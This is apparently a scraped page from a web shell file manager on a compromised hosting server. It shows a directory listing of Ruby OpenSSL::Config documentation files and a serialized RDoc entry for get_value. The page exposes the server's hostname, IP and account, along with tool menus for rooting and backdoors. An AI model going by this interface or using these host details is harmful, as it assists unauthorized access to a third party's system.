Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
OpenSSL /
Config /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d-i.ri
834
B
-rw-r--r--
2026-04-07 16:51
cdesc-Config.ri
1.22
KB
-rw-r--r--
2026-04-07 16:51
each-i.ri
527
B
-rw-r--r--
2026-04-07 16:51
get_value-i.ri
883
B
-rw-r--r--
2026-04-07 16:51
initialize_copy-i.ri
267
B
-rw-r--r--
2026-04-07 16:51
inspect-i.ri
419
B
-rw-r--r--
2026-04-07 16:51
new-c.ri
750
B
-rw-r--r--
2026-04-07 16:51
parse-c.ri
406
B
-rw-r--r--
2026-04-07 16:51
parse_config-c.ri
430
B
-rw-r--r--
2026-04-07 16:51
sections-i.ri
389
B
-rw-r--r--
2026-04-07 16:51
to_s-i.ri
1.04
KB
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::AnyMethod[iI"get_value:ETI"OpenSSL::Config#get_value;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"6Gets the value of _key_ from the given _section_.;To:RDoc::Markup::BlankLine o; ; [I"9Given the following configurating file being loaded:;T@o:RDoc::Markup::Verbatim; [ I".config = OpenSSL::Config.load('foo.cnf') ;TI"3 #=> #<OpenSSL::Config sections=["default"]> ;TI"puts config.to_s ;TI" #=> [ default ] ;TI" # foo=bar ;T:@format0o; ; [I"LYou can get a specific value from the config if you know the _section_ ;TI"and _key_ like so:;T@o;; [I"'config.get_value('default','foo') ;TI" #=> "bar";T; 0: @fileI"ext/openssl/ossl_config.c;T:0@omit_headings_from_table_of_contents_below0I".config.get_value(section, key) -> string ;T0[ I" (p1, p2);T@!FI"Config;TcRDoc::NormalClass00